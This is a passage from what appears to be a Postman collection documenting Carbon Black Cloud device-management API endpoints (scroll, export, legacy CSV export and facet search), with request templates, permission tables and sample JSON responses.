{\n            \"end\": \"<string>\",\n            \"range\": \"<string>\",\n            \"start\": \"<string>\"\n        },\n        \"os\": [ \"<string>\", \"<string>\" ],\n        \"os_version\": [ \"<string>\", \"<string>\" ],\n        \"policy_id\": [ <long>, <long> ],\n        \"sensor_gateway_url\": [ \"<string>\", \"<string>\" ],\n        \"sensor_version\": [ \"<string>\", \"<string>\" ],\n        \"signature_status\": [ \"<string>\", \"<string>\" ],\n        \"status\": [ \"<string>\", \"<string>\" ],\n        \"sub_deployment_type\": [ \"<string>\", \"<string>\" ],\n        \"subnet\": [ \"<string>\", \"<string>\" ],\n        \"target_priority\": [ \"<string>\", \"<string>\" ],\n        \"vcenter_host_url\": [ \"<string>\", \"<string>\" ],\n        \"vcenter_name\": [ \"<string>\", \"<string>\" ],\n        \"vcenter_uuid\": [ \"<string>\", \"<string>\" ],\n        \"virtual_private_cloud_id\": [ \"<string>\", \"<string>\" ],\n        \"virtualization_provider\": [ \"<string>\", \"<string>\" ],\n        \"vm_uuid\": [ \"<string>\", \"<string>\" ]\n    },\n    \"exclusions\": {\n      \"sensor_version\": [ \"<string>\", \"<string>\" ]\n    },\n    \"query\": \"<string>\",\n    \"rows\": <long>,\n    \"search_after\": \"<string>\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/devices/_scroll","description":"<p>Scroll devices in your organization beyond the search limitations.</p>\n<p>After requesting the initial results use the <code>search_after</code> from the response and the same search request to paginate the remaining devices. Repeat using the next <code>search_after</code> in the response until <code>search_after</code> is no longer present indicating all devices have been paginated.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>device</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/devices-api/#scroll-devices\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","devices","_scroll"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"821ea1b3-8421-4fce-ae75-f3efdb67e7ab","name":"Scroll Devices","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"criteria\": {\n    \"deployment_type\": [\"AWS\", \"AZURE\", \"GCP\"],\n    \"last_contact_time\": {\n      \"start\": \"2023-10-01T00:00:00.000Z\",\n      \"end\": \"2023-11-21T00:00:00.000Z\"\n    },\n    \"target_priority\": [\"MEDIUM\", \"LOW\"]\n  },\n  \"query\": \"os:WINDOWS\",\n  \"rows\": 100\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/devices/_scroll"},"status":"OK","code":200,"_postman_previewlanguage":null,"header":null,"cookie":[],"responseTime":null,"body":"{\n    \"num_found\": 12,\n    \"num_remaining\": 0,\n    \"search_after\": \"MTk5NjEwMTY=\",\n    \"results\": [\n        {\n            \"activation_code\": null,\n            \"activation_code_expiry_time\": \"2022-03-30T11:06:49.536Z\",\n            \"ad_domain\": null,\n            \"ad_group_id\": 0,\n            \"ad_org_unit\": null,\n            \"appliance_name\": null,\n            \"appliance_uuid\": null,\n            \"auto_scaling_group_name\": null,\n            \"av_ave_version\": \"8.3.66.52\",\n            \"av_engine\": \"4.15.1.560-ave.8.3.66.52:avpack.8.5.2.114:vdf.8.19.36.68:vdfdate.20230310\",\n            \"av_last_scan_time\": null,\n            \"av_master\": false,\n            \"av_pack_version\": \"8.5.2.114\",\n            \"av_product_version\": \"4.15.1.560\",\n            \"av_status\": [\n                \"AV_BYPASS\"\n            ],\n            \"av_update_servers\": null,\n            \"av_vdf_version\": \"8.19.36.68\",\n            \"base_device\": null,\n            \"cloud_provider_account_id\": null,\n            \"cloud_provider_resource_id\": null,\n            \"cloud_provider_tags\": [],\n            \"cloud_provider_resource_group\": null,\n            \"cloud_provider_scale_group\": null,\n            \"cloud_provider_network\": null,\n            \"cloud_provider_managed_identity\": null,\n            \"cluster_name\": null,\n            \"compliance_status\": \"NOT_ASSESSED\",\n            \"current_sensor_policy_name\": \"Standard\",\n            \"policy_override\": true,\n            \"quarantined\": false,\n            \"datacenter_name\": null,\n            \"deployment_type\": \"AWS\",\n            \"deregistered_time\": null,\n            \"device_meta_data_item_list\": [\n                {\n                    \"key_name\": \"OS_MAJOR_VERSION\",\n                    \"key_value\": \"Windows 10\",\n                    \"position\": 0\n                },\n                {\n                    \"key_name\": \"SUBNET\",\n                    \"key_value\": \"111.22.33.4\",\n                    \"position\": 0\n                }\n            ],\n            \"device_owner_id\": 15413968,\n            \"email\": \"\",\n            \"esx_host_name\": null,\n            \"esx_host_uuid\": null,\n            \"first_name\": null,\n            \"golden_device\": null,\n            \"golden_device_id\": null,\n            \"asset_group\": [\n              {\n                \"id\": \"fb32fcc1-3bfe-4945-9b6a-46a5049856cd\",\n                \"name\": \"test\",\n                \"membership_type\": \"DYNAMIC\"\n              }\n            ],\n            \"host_based_firewall_reasons\": [],\n            \"host_based_firewall_status\": null,\n            \"id\": 16554343,\n            \"infrastructure_provider\": \"NONE\",\n            \"last_contact_time\": \"2023-11-20T19:36:57.351Z\",\n            \"last_device_policy_changed_time\": \"2023-03-10T04:00:51.188Z\",\n            \"last_device_policy_requested_time\": \"2023-10-26T20:14:33.773Z\",\n            \"last_external_ip_address\": \"12.34.4.56\",\n            \"last_internal_ip_address\": \"123.45.67.89\",\n            \"last_location\": \"OFFSITE\",\n            \"last_name\": null,\n            \"last_reported_time\": \"2023-11-20T19:27:46.387Z\",\n            \"last_reset_time\": null,\n            \"last_shutdown_time\": \"2023-04-03T04:03:30.867Z\",\n            \"linux_kernel_version\": null,\n            \"login_user_name\": \"EC2AMAZ-123456\\\\Administrator\",\n            \"mac_address\": \"0a2111f3bd35\",\n            \"middle_name\": null,\n            \"name\": \"EC2AMAZ-123456\",\n            \"nsx_distributed_firewall_policy\": null,\n            \"nsx_enabled\": null,\n            \"organization_id\": 3710476,\n            \"organization_name\": \"myorg.com\",\n            \"os\": \"WINDOWS\",\n            \"os_version\": \"Windows Server 2019 x64 SP: 0\",\n            \"passive_mode\": false,\n            \"policy_id\": 20440908,\n            \"policy_name\": \"Standard\",\n            \"registered_time\": \"2022-05-30T12:23:29.364Z\",\n            \"scan_last_action_time\": null,\n            \"scan_last_complete_time\": null,\n            \"scan_status\": null,\n            \"sensor_gateway_url\": null,\n            \"sensor_gateway_uuid\": null,\n            \"sensor_kit_type\": \"WINDOWS\",\n            \"sensor_out_of_date\": true,\n            \"sensor_pending_update\": false,\n            \"sensor_states\": [\n                \"ACTIVE\",\n                \"LIVE_RESPONSE_NOT_RUNNING\",\n                \"LIVE_RESPONSE_NOT_KILLED\",\n                \"LIVE_RESPONSE_DISABLED\"\n            ],\n            \"sensor_version\": \"3.8.0.535\",\n            \"status\": \"REGISTERED\",\n            \"target_priority\": \"LOW\",\n            \"uninstall_code\": \"K9PDWRD4\",\n            \"vcenter_host_url\": null,\n            \"vcenter_name\": null,\n            \"vcenter_uuid\": null,\n            \"vdi_base_device\": null,\n            \"vdi_provider\": \"NONE\",\n            \"virtual_machine\": true,\n            \"virtual_private_cloud_id\": null,\n            \"virtualization_provider\": \"AWS_EC2\",\n            \"vm_ip\": null,\n            \"vm_name\": null,\n            \"vm_uuid\": null,\n            \"vulnerability_score\": 10,\n            \"vulnerability_severity\": \"CRITICAL\",\n            \"windows_platform\": null,\n            \"last_policy_updated_time\": null\n        },\n        ... truncated ...\n    ]\n}"}],"_postman_id":"9dfa5439-757b-474f-a539-b69fc8bb4435"},{"name":"Export Devices","id":"8e4a978f-c0ee-4c5c-a173-fddddca64549","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n     \"criteria\": {\n        \"ad_distinguished_name\": [ \"<string>\", \"<string>\" ],\n        \"ad_domain\": [ \"<string>\", \"<string>\" ],\n        \"ad_group_id\": [ <long>, <long> ],\n        \"ad_org_unit\": [ \"<string>\", \"<string>\" ],\n        \"auto_scaling_group_name\": [ \"<string>\", \"<string>\" ],\n        \"base_device\": <boolean>,\n        \"cloud_provider_account_id\": [ \"<string>\", \"<string>\" ],\n        \"cloud_provider_managed_identity\": [ \"<string>\", \"<string>\" ],\n        \"cloud_provider_network\": [ \"<string>\", \"<string>\" ],\n        \"cloud_provider_resource_group\": [ \"<string>\", \"<string>\" ],\n        \"cloud_provider_resource_id\": [ \"<string>\", \"<string>\" ],\n        \"cloud_provider_scale_group\": [ \"<string>\", \"<string>\" ],\n        \"cloud_provider_tags\": [ \"<string>\", \"<string>\" ],\n        \"cluster_name\": [ \"<string>\", \"<string>\" ],\n        \"compliance_status\": [ \"<string>\", \"<string>\" ],\n        \"datacenter_name\": [ \"<string>\", \"<string>\" ],\n        \"deployment_type\": [ \"<string>\", \"<string>\" ],\n        \"esx_host_name\": [ \"<string>\", \"<string>\" ],\n        \"golden_device_id\": [ \"<string>\", \"<string>\" ],\n        \"golden_device_status\": [ \"<string>\", \"<string>\" ],\n        \"asset_group_id\": [ \"<string>\", \"<string>\" ],\n        \"asset_group_name\": [ \"<string>\", \"<string>\" ],\n        \"host_based_firewall_status\": [ \"<string>\", \"<string>\" ],\n        \"id\": [ <long>, <long> ],\n        \"infrastructure_provider\": [ \"<string>\", \"<string>\" ],\n        \"last_contact_time\": {\n            \"end\": \"<string>\",\n            \"range\": \"<string>\",\n            \"start\": \"<string>\"\n        },\n        \"os\": [ \"<string>\", \"<string>\" ],\n        \"os_version\": [ \"<string>\", \"<string>\" ],\n        \"policy_id\": [ <long>, <long> ],\n        \"sensor_gateway_url\": [ \"<string>\", \"<string>\" ],\n        \"sensor_version\": [ \"<string>\", \"<string>\" ],\n        \"signature_status\": [ \"<string>\", \"<string>\" ],\n        \"status\": [ \"<string>\", \"<string>\" ],\n        \"sub_deployment_type\": [ \"<string>\", \"<string>\" ],\n        \"subnet\": [ \"<string>\", \"<string>\" ],\n        \"target_priority\": [ \"<string>\", \"<string>\" ],\n        \"vcenter_host_url\": [ \"<string>\", \"<string>\" ],\n        \"vcenter_name\": [ \"<string>\", \"<string>\" ],\n        \"vcenter_uuid\": [ \"<string>\", \"<string>\" ],\n        \"virtual_private_cloud_id\": [ \"<string>\", \"<string>\" ],\n        \"virtualization_provider\": [ \"<string>\", \"<string>\" ],\n        \"vm_uuid\": [ \"<string>\", \"<string>\" ]\n    },\n    \"exclusions\": {\n      \"sensor_version\": [\n        \"<string>\"\n      ]\n    },\n    \"format\":  \"<string>\",\n    \"query\": \"<string>\",\n    \"sort\": [\n      {\n        \"field\": \"<string>\",\n        \"order\": \"<string>\"\n      }\n    ],\n    \"rows\": \"<long>\",\n    \"start\": \"<long>\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/devices/_export","description":"<p>Export devices in your organization using the job service.</p>\n<p>To receive the actual JSON or CSV results, you need to use the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/job-service-api/\">Job Service API</a>. First, use the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/job-service-api/#get-job-details\">Get Job Details</a> to get the status of the async job, then <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/job-service-api/#download-job-output\">Download Job Output</a> call to download the actual content.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>device</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/devices-api/#export-devices\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","devices","_export"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"790558d7-8aff-42d6-9e47-74e176a70a49","name":"Export Devices","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"criteria\": {\n    \"deployment_type\": [\"ENDPOINT\"],\n    \"target_priority\": [\"MEDIUM\"],\n    \"last_contact_time\": {\n        \"start\": \"2023-10-01T00:00:00.000Z\",\n        \"end\": \"2023-11-22T00:00:00.000Z\"\n      }\n  },\n  \"format\": \"CSV\",\n  \"rows\": 5,\n  \"start\": 0,\n  \"sort\": [\n    {\n      \"field\": \"av_pack_version\",\n      \"order\": \"ASC\"\n    }\n  ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/devices/_export"},"status":"See Other","code":303,"_postman_previewlanguage":null,"header":[{"key":"Location: /jobs/v1/orgs/ABCD1234/jobs/5865983","value":"","description":""}],"cookie":[],"responseTime":null,"body":"{\n  \"job_id\": 5865983\n}"}],"_postman_id":"8e4a978f-c0ee-4c5c-a173-fddddca64549"},{"name":"Legacy Export Devices (CSV)","id":"3f30bbaa-a8c1-4865-b78b-477817f20b1c","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/devices/_search/download?ad_group_id=&status=&policy_id\t=&query_string=&target_priority=&sort_field=&sort_order=","description":"<p><em><strong>Deprecated:</strong></em> <em>This has been replaced by</em> <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/devices-api/#export-devices\"><em>Export Devices</em></a></p>\n<h3 id=\"️rbac-permissions-required\">️RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>device</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"parameters\">Parameters</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Field</th>\n<th>Description</th>\n<th>Default</th>\n<th>Required</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td><code>status</code></td>\n<td>Device statuses to match. Allowed values: <code>PENDING</code>, <code>REGISTERED</code>, <code>UNINSTALLED</code>, <code>DEREGISTERED</code>, <code>ACTIVE</code>, <code>INACTIVE</code>, <code>ERROR</code>, <code>ALL</code>, <code>BYPASS_ON</code>, <code>BYPASS</code>, <code>QUARANTINE</code>, <code>SENSOR_OUTOFDATE</code>, <code>DELETED</code>, <code>LIVE</code></td>\n<td>N/A</td>\n<td>Yes</td>\n</tr>\n<tr>\n<td><code>ad_group_id</code></td>\n<td>Active Directory group IDs to match</td>\n<td>N/A</td>\n<td>No</td>\n</tr>\n<tr>\n<td><code>policy_id</code></td>\n<td>Carbon Black Cloud Policy IDs to match</td>\n<td></td>\n<td>No</td>\n</tr>\n<tr>\n<td><code>query_string</code></td>\n<td>Device query string</td>\n<td>N/A</td>\n<td>No</td>\n</tr>\n<tr>\n<td><code>target_priority</code></td>\n<td>Device target priorities to match. Allowed values: <code>LOW</code>, <code>MEDIUM</code>, <code>HIGH</code>, <code>MISSION_CRITICAL</code></td>\n<td>N/A</td>\n<td>No</td>\n</tr>\n<tr>\n<td><code>sort_field</code></td>\n<td>Field to sort results by</td>\n<td>N/A</td>\n<td>No</td>\n</tr>\n<tr>\n<td><code>sort_order</code></td>\n<td>Sort order. Allowed values: <code>ASC</code>, <code>DESC</code></td>\n<td>N/A</td>\n<td>No</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/devices-api/#legacy-export-devices-csv\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","devices","_search","download"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>Active Directory group IDs to match</p>\n","type":"text/plain"},"key":"ad_group_id","value":""},{"description":{"content":"<p>Device statuses to match. Allowed values: PENDING, REGISTERED, UNINSTALLED, DEREGISTERED, ACTIVE, INACTIVE, ERROR, ALL, BYPASS_ON, BYPASS, QUARANTINE, SENSOR_OUTOFDATE, DELETED, LIVE</p>\n","type":"text/plain"},"key":"status","value":""},{"description":{"content":"<p>PSC Policy IDs to match</p>\n","type":"text/plain"},"key":"policy_id\t","value":""},{"description":{"content":"<p>Device query string</p>\n","type":"text/plain"},"key":"query_string","value":""},{"description":{"content":"<p>Device target priorities to match. Allowed values: LOW, MEDIUM, HIGH, MISSION_CRITICAL</p>\n","type":"text/plain"},"key":"target_priority","value":""},{"description":{"content":"<p>Field to sort results by</p>\n","type":"text/plain"},"key":"sort_field","value":""},{"description":{"content":"<p>Sort order. Allowed values: ASC, DESC</p>\n","type":"text/plain"},"key":"sort_order","value":""}],"variable":[]}},"response":[],"_postman_id":"3f30bbaa-a8c1-4865-b78b-477817f20b1c"},{"name":"Device Facet","id":"a472f607-5d67-4950-8057-fc52511d4e8a","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"criteria\": {\n        \"ad_distinguished_name\": [ \"<string>\", \"<string>\" ],\n        \"ad_domain\": [ \"<string>\", \"<string>\" ],\n        \"ad_group_id\": [ <long>, <long> ],\n        \"ad_org_unit\": [ \"<string>\", \"<string>\" ],\n        \"auto_scaling_group_name\": [ \"<string>\", \"<string>\" ],\n        \"base_device\": <boolean>,\n        \"cloud_provider_account_id\": [ \"<string>\", \"<string>\" ],\n        \"cloud_provider_managed_identity\": [ \"<string>\", \"<string>\" ],\n        \"cloud_provider_network\": [ \"<string>\", \"<string>\" ],\n        \"cloud_provider_resource_group\": [ \"<string>\", \"<string>\" ],\n        \"cloud_provider_resource_id\": [ \"<string>\", \"<string>\" ],\n        \"cloud_provider_scale_group\": [ \"<string>\", \"<string>\" ],\n        \"cloud_provider_tags\": [ \"<string>\", \"<string>\" ],\n        \"cluster_name\": [ \"<string>\", \"<string>\" ],\n        \"compliance_status\": [ \"<string>\", \"<string>\" ],\n        \"datacenter_name\": [ \"<string>\", \"<string>\" ],\n        \"deployment_type\": [ \"<string>\", \"<string>\" ],\n        \"esx_host_name\": [ \"<string>\", \"<string>\" ],\n        \"golden_device_id\": [ \"<string>\", \"<string>\" ],\n        \"golden_device_status\": [ \"<string>\", \"<string>\" ],\n        \"asset_group_id\": [ \"<string>\", \"<string>\" ],\n        \"asset_group_name\": [ \"<string>\", \"<string>\" ],\n        \"host_based_firewall_status\": [ \"<string>\", \"<string>\" ],\n        \"id\": [ <long>, <long> ],\n        \"infrastructure_provider\": [ \"<string>\", \"<string>\" ],\n        \"last_contact_time\": {\n            \"end\": \"<string>\",\n            \"range\": \"<string>\",\n            \"start\": \"<string>\"\n        },\n        \"os\": [ \"<string>\", \"<string>\" ],\n        \"os_version\": [ \"<string>\", \"<string>\" ],\n        \"policy_id\": [ <long>, <long> ],\n        \"sensor_gateway_url\": [ \"<string>\", \"<string>\" ],\n        \"sensor_version\": [ \"<string>\", \"<string>\" ],\n        \"signature_status\": [ \"<string>\", \"<string>\" ],\n        \"status\": [ \"<string>\", \"<string>\" ],\n        \"sub_deployment_type\": [ \"<string>\", \"<string>\" ],\n        \"subnet\": [ \"<string>\", \"<string>\" ],\n        \"target_priority\": [ \"<string>\", \"<string>\" ],\n        \"vcenter_host_url\": [ \"<string>\", \"<string>\" ],\n        \"vcenter_name\": [ \"<string>\", \"<string>\" ],\n        \"vcenter_uuid\": [ \"<string>\", \"<string>\" ],\n        \"virtual_private_cloud_id\": [ \"<string>\", \"<string>\" ],\n        \"virtualization_provider\": [ \"<string>\", \"<string>\" ],\n        \"vm_uuid\": [ \"<string>\", \"<string>\" ]\n    },\n  \"exclusions\": {\n    \"sensor_version\": [\n      \"<string>\"\n    ]\n  },\n  \"query\": \"<string>\",\n  \"terms\": {\n    \"fields\": [\n      \"<string>\"\n    ],\n    \"rows\": \"<long>\"\n  }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/devices/_facet","description":"<p>Executes a device facet search which generates statistics indicating the relative weighting of values for the specified terms.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>device</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/devices-api/#facet-devices\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","devices","_facet"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"e930a19d-ec2c-44a5-8586-709051e0996d","name":"Device Facet","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"criteria\": {\n    \"deployment_type\": [\n      \"ENDPOINT\"\n    ]\n  },\n  \"sort\": [\n    {\n      \"field\": \"last_contact_time\",\n      \"order\": \"DESC\"\n    }\n  ],\n  \"start\": 1,\n  \"rows\": 50,\n  \"query\": \"\",\n  \"terms\": {\n    \"rows\": 201,\n    \"fields\": [\n      \"status\",\n      \"sensor_version\",\n      \"os\",\n      \"signature_status\",\n      \"policy_id\",\n      \"golden_device_status\",\n      \"host_based_firewall_status\",\n      \"os_version\"\n    ]\n  }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/devices/_facet"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 18 Aug 2023 02:16:21 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Transfer-Encoding","value":"chunked"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=302B97EC6CABD71D97BB6D6BD52D08E1; Path=/appservices; Secure; HttpOnly"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"results\": [\n        {\n            \"field\": \"status\",\n            \"values\": [\n                {\n                    \"total\": 657,\n                    \"id\": \"INACTIVE\",\n                    \"name\": \"INACTIVE\"\n                },\n                {\n                    \"total\": 436,\n                    \"id\": \"SENSOR_OUTOFDATE\",\n                    \"name\": \"SENSOR_OUTOFDATE\"\n                },\n                {\n                    \"total\": 235,\n                    \"id\": \"DEREGISTERED\",\n                    \"name\": \"DEREGISTERED\"\n                },\n                {\n                    \"total\": 102,\n                    \"id\": \"BYPASS\",\n                    \"name\": \"BYPASS\"\n                },\n                {\n                    \"total\": 31,\n                    \"id\": \"PENDING\",\n                    \"name\": \"PENDING\"\n                },\n                {\n                    \"total\": 23,\n                    \"id\": \"ACTIVE\",\n                    \"name\": \"ACTIVE\"\n                },\n                {\n                    \"total\": 20,\n                    \"id\": \"QUARANTINE\",\n                    \"name\": \"QUARANTINE\"\n                },\n                {\n                    \"total\": 12,\n                    \"id\": \"SENSOR_PENDING_UPDATE\",\n                    \"name\": \"SENSOR_PENDING_UPDATE\"\n                },\n                {\n                    \"total\": 0,\n                    \"id\": \"ERROR\",\n                    \"name\": \"ERROR\"\n                }\n            ]\n        },\n        {\n            \"field\": \"policy_id\",\n            \"values\": [\n                {\n                    \"total\": 983,\n                    \"id\": \"6525\",\n                    \"name\": \"6525\"\n                },\n                {\n                    \"total\": 12,\n                    \"id\": \"112221\",\n                    \"name\": \"112221\"\n                },\n                {\n                    \"total\": 12,\n                    \"id\": \"7691\",\n                    \"name\": \"7691\"\n                },\n                {\n                    \"total\": 8,\n                    \"id\": \"93661\",\n                    \"name\": \"93661\"\n                },\n                {\n                    \"total\": 7,\n                    \"id\": \"109968\",\n                    \"name\": \"109968\"\n                },\n                {\n                    \"total\": 5,\n                    \"id\": \"65066\",\n                    \"name\": \"65066\"\n                },\n                {\n                    \"total\": 5,\n                    \"id\": \"68727\",\n                    \"name\": \"68727\"\n                },\n                {\n                    \"total\": 3,\n                    \"id\": \"69390\",\n                    \"name\": \"69390\"\n                },\n                {\n                    \"total\": 3,\n                    \"id\": \"88514\",\n                    \"name\": \"88514\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"115305\",\n                    \"name\": \"115305\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"99682\",\n                    \"name\": \"99682\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"101958\",\n                    \"name\": \"101958\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"104163\",\n                    \"name\": \"104163\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"129938\",\n                    \"name\": \"129938\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"130711\",\n                    \"name\": \"130711\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"35704\",\n                    \"name\": \"35704\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"80947\",\n                    \"name\": \"80947\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"98583\",\n                    \"name\": \"98583\"\n                }\n            ]\n        },\n        {\n            \"field\": \"os\",\n            \"values\": [\n                {\n                    \"total\": 733,\n                    \"id\": \"windows\",\n                    \"name\": \"windows\"\n                },\n                {\n                    \"total\": 192,\n                    \"id\": \"mac\",\n                    \"name\": \"mac\"\n                },\n                {\n                    \"total\": 93,\n                    \"id\": \"linux\",\n                    \"name\": \"linux\"\n                }\n            ]\n        },\n        {\n            \"field\": \"os_version\",\n            \"values\": [\n                {\n                    \"total\": 416,\n                    \"id\": \"Windows 10 x64\",\n                    \"name\": \"Windows 10 x64\"\n                },\n                {\n                    \"total\": 98,\n                    \"id\": \"Windows 11 x64\",\n                    \"name\": \"Windows 11 x64\"\n                },\n                {\n                    \"total\": 41,\n                    \"id\": \"MAC OS 11.5.2\",\n                    \"name\": \"MAC OS 11.5.2\"\n                },\n                {\n                    \"total\": 39,\n                    \"id\": \"Windows 7 x64 SP: 1\",\n                    \"name\": \"Windows 7 x64 SP: 1\"\n                },\n                {\n                    \"total\": 37,\n                    \"id\": \"Windows 10 x86\",\n                    \"name\": \"Windows 10 x86\"\n                },\n                {\n                    \"total\": 34,\n                    \"id\": \"Windows Server 2016 x64\",\n                    \"name\": \"Windows Server 2016 x64\"\n                },\n                {\n                    \"total\": 28,\n                    \"id\": \"Linux (Unsupported)\",\n                    \"name\": \"Linux (Unsupported)\"\n                },\n                {\n                    \"total\": 25,\n                    \"id\": \"Windows Server 2019 x64\",\n                    \"name\": \"Windows Server 2019 x64\"\n                },\n                {\n                    \"total\": 18,\n                    \"id\": \"Server 2012 R2 x64\",\n                    \"name\": \"Server 2012 R2 x64\"\n                },\n                {\n                    \"total\": 13,\n                    \"id\": \"Windows 7 x86 SP: 1\",\n                    \"name\": \"Windows 7 x86 SP: 1\"\n                },\n                {\n                    \"total\": 13,\n                    \"id\": \"Windows 8.1 x64\",\n                    \"name\": \"Windows 8.1 x64\"\n                },\n                {\n                    \"total\": 12,\n                    \"id\": \"MAC OS 12.0.1\",\n                    \"name\": \"MAC OS 12.0.1\"\n                },\n                {\n                    \"total\": 12,\n                    \"id\": \"Windows 8.1 x86\",\n                    \"name\": \"Windows 8.1 x86\"\n                },\n                {\n                    \"total\": 10,\n                    \"id\": \"MAC OS 11.6.0\",\n                    \"name\": \"MAC OS 11.6.0\"\n                },\n                {\n                    \"total\": 8,\n                    \"id\": \"Amazon Linux 2.0\",\n                    \"name\": \"Amazon Linux 2.0\"\n                },\n                {\n                    \"total\": 8,\n                    \"id\": \"MAC OS X 10.16.0\",\n                    \"name\": \"MAC OS X 10.16.0\"\n                